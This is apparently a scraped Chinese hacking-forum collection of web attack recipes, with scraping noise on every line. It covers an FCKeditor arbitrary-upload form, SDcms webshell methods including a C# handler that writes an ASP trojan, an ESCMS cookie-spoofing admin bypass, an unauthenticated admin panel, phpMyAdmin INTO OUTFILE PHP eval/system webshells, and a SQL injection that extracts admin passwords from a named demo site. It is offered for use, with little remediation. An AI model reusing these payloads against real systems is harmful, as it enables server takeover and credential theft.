: G9 X' s. x; z' M! O0 V! k0 f' s+ _0 Q8 \& o/ J) O
http://xxoo.com/controls/fckedit ... aspx/connector.aspx [$ B- w7 ]1 W: L D( W6 s
跳转到网站根目录上传任意文件。
! ^" m* B( F0 A, Z" d- i如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件2 }6 p. g+ {- O C1 Q# T* j* `6 c
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
/ z2 W+ y& ?7 IUpload a new file:<br>) ]3 j/ l1 ~! q
<input type="file" name="NewFile" size="50"><br>
9 u( L8 ^- R1 r- n/ N4 U<input id="btnUpload" type="submit" value="Upload">
! U: E0 n- ]; x8 g9 q. @</form>
3 W6 v- U: d2 b-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( o' N" y8 c* ^ t7 {8 E
% c$ o3 |& s' `5 ? ?6 y9 T
SDcms 后台拿webshell; f3 d( U% |0 Y* w+ }, D% h1 q9 e
- |/ `5 U, h6 b第一种方法:
% R( p* F1 f" G0 L) u& g进入后台-->系统管理-->系统设置-->系统设置->网站名称;
- w- q' }! Q' v: y把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
( W1 Q, D# A0 f r# M8 J用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。/ {8 p O2 v" W
第二种方法:
* M5 U4 J4 `! `' \, W进入后台-->系统管理-->系统设置-->系统设置->上传设置;7 B3 p/ I x1 o. r
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!' i& m4 I" d. C
第三种方法:0 M E S& p1 _- B- f0 c
进入后台-->界面管理-->模板文件管理-->创建文件
* U+ ]3 C3 f8 \8 W4 w4 W& a文件名写入getshell.ashx
; K3 C! j) Z- G8 ?8 O5 N6 t内容写入下面内容:
( m4 K7 N0 e$ {7 l. r% k2 |+ ]/====================复制下面的=========================/( Q R# K9 N" Q" i7 _) l( J
<%@ WebHandler Language="C#" Class="Handler" %>
: }4 o, W# [. g4 }: Q1 k& m Uusing System;
- h/ D3 N. F# i) tusing System.Web; ?" A* D: V' j1 j0 ^: f: S
using System.IO;% l- }4 K7 I( x& R8 ^
public class Handler : IHttpHandler {* h- ?; m5 \6 L5 Q, u7 U5 ~
public void ProcessRequest (HttpContext context) {
! j9 Q9 H( I# `" Y7 Rcontext.Response.ContentType = "text/plain";" q' }' E1 Z5 }2 ~- t S1 @
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));" D- s8 {4 [4 M9 }
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");+ F/ V$ i0 o1 _' b! Y6 F
file1.Flush();
( I: _8 l; p. u/ z, N% `0 Tfile1.Close();& s- l u0 [ r" x- Q. j& [7 W
}: ?- o2 X% ]6 }3 ~. W( X" f
public bool IsReusable {" B- v H8 e5 W# }: B
get {4 R8 y* {! Q3 ~$ ~2 L; h/ I
return false;
, b* e# n( s8 F9 `1 [}% U9 ~% b, x" \9 \6 p# b! W
}
3 \; A* I" D( l8 ^7 J}
" Z2 y- h" y [9 V9 a# U/=============================================/; ]/ a6 @; }3 b) ]+ e
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
! Z& M8 n# L1 C, ~会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
* i6 l6 x7 D, K$ p* J3 l-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 r" m; v. \0 x6 D) s
$ m' _ ^4 R8 n0 Y4 \& S
ESCMS网站管理系统0day6 g. \% l. W1 g. T9 k" U3 W9 u ~
, h6 k/ |( _2 e9 l后台登陆验证是通过admin/check.asp实现的
8 @( L* L- P1 ?5 R: H1 B" D2 H9 E+ C; ?# T
首先我们打开http://target.com/admin/es_index.html. K& Q6 X. x! r3 H
然后在COOKIE结尾加上
, `8 G0 g- q" w. O- ` v3 r- F; ESCMS$_SP2=ES_admin=st0p;& M$ d* V A: H0 T( U( Z+ y
修改,然后刷新
( [/ s% j8 s P; X" V5 j进后台了嘎..! t3 M9 i9 F, I( h- D: X. q
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL! U$ e0 |& C5 K9 y% H
" J' C; F1 l6 u* o9 T利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% J! p; n& a* ~. `, Q嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp& t3 G, ]9 {8 C7 f) W
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
; V) k+ j g( O9 N- |- H U在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了3 f: S' e' `+ z2 \& n+ x/ X
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------' c# k: h; R7 w
9 U7 p3 u' ^& M: G9 A" S
宁志网站管理系统后台无验证漏洞及修复( b9 E; t( l: I1 X, z
/ B9 D+ A' s8 V2 ?3 s网上搜了一下,好像没有发布.如有雷同纯粹巧合!
: q. l" u% R* F$ p1 Q官方网站:www.ningzhi.net+ i4 @5 X6 W+ r5 B/ w* M! \- A
学校网站管理系统 V.2011版本
7 ^' a. m. k ~1 m0 Lhttp://down.chinaz.com/soft/29943.htm ' ]9 s$ M/ X+ l2 v" j
其它版本(如:政府版等),自行下载.% b9 v0 W$ ?# K/ O
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
! Y- Z/ Z1 k9 s2 Y0 | j0 Hlogin.asp代码如下:
# e: R/ K$ B" A* h7 {<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> ( p8 v( ?9 T% A X
manage.asp代码我就不帖出来了.反正也没验证.
* Y7 C) q. Y; c) X: b5 k只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
, l u7 l" p9 m, Z5 z! Y/ D% t漏洞利用:
- J b* L" d( I- n直接访问http://www.0855.tv/admin/manage.asp
v$ Y; G0 Q( ]2 m$ ]9 {数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web58 N$ `/ m2 v! ]9 `
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 |; O7 q& g9 R
! m' ~$ U) `4 L& D. J$ g. @# mphpmyadmin拿shell的四种方法总结及修复
5 M% Q; N/ M0 Y( E- |1 X
D7 U) L! o: W$ L方法一:8 j* j! p: v: q% e
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );5 C" ~" J9 @% r3 ~: B
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
* C8 Z! x' @" A$ j: N5 dSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
8 p) J7 y; s: u* C1 x& W- |----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php$ @, ]& }1 [: A
一句话连接密码:7on* m1 W, T& z$ \) V% O
方法二:
! J& K3 L, Y0 I读取文件内容: select load_file('E:/xamp/www/s.php');7 s$ c# n7 R& ~) U% t
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
6 l; q: l; e$ O4 K1 `: i1 Z. vcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
8 q. d4 E5 X% v( Y, T' N方法三:# W# V/ t t7 }; z6 N
JhackJ版本 PHPmyadmin拿shell* S; t S2 a! }1 z2 D2 }" F
Create TABLE study (cmd text NOT NULL);8 O0 C( z* [0 A3 z
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
9 `) [# v: W; x) y i4 [, T$ O6 jselect cmd from study into outfile 'E:/wamp/www/7.php';
: t) c3 Q8 z% F0 ]" ?3 \% mDrop TABLE IF EXISTS study;+ ~" J3 Q7 U: j
<?php eval($_POST[cmd])?>
' |: A p' p6 T9 o- ` k) M6 ZCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
0 j$ v2 l$ ]( Q; l& eINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1& @. q! `. V# S; p+ \* T
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
Z$ U1 P$ l2 w% q6 E, lDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。- F$ k( f7 q( g9 f
方法四:' _' c8 L+ o& W+ L w4 M; Z
select load_file('E:/xamp/www/study.php');
4 Y; }: [$ _; F4 tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'; ~& m/ ~3 | a3 g
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
/ j1 n! ~# M/ a1 x S-----------------------------------------------------------------------------------------------------------------------------------------------------------------------1 G( }! X' ~" q: E3 p% s e# X" _, G
3 w( r# k4 U. f. Y2 b+ K. x, o4 a9 bNO.001中学网站管理系统 Build 110628 注入漏洞
/ x: y# F7 \7 B3 Y4 A6 V/ S* D4 X
( K% ^6 y4 g. {9 C$ XNO.001中学网站管理系统功能模块: j _5 y! d S) D, n
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等' v3 Z% _" X+ l! a" |
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息- H5 L' S7 M$ M% O; p# p6 B
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
. b$ g* C( e3 X6 s. n, o: _4.视频图片管理:一级分类,动态添加视频或者图片等信息& C/ N$ w* u) ?# m0 a
5.留言管理:对留言,修改,删除、回复等管理 H) r7 {$ L; g8 ~
6.校友频道:包括校友资料excel导出、管理等功能. v8 T/ N+ o k! o; w$ r
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页2 \. ?( k3 @+ F2 z$ V; `
默认后台:admin/login.asp7 n" V' b7 ^& p6 I+ K
官方演示:http://demo.001cms.net
$ i W4 V$ B4 k# R源码下载地址:http://down.chinaz.com/soft/30187.htm
0 t' E' Q$ h! c) a; |) N% _EXP:7 F `' J3 v) B* l7 \4 g/ |( t8 }+ ?
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin [: x6 E& W3 P0 X
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin# X1 L" s8 l$ g: f6 J. j
getshell:后台有备份,你懂的
0 ]9 N7 F* p" R另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
0 X$ a$ G# Z( e1 Y5 @9 D------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |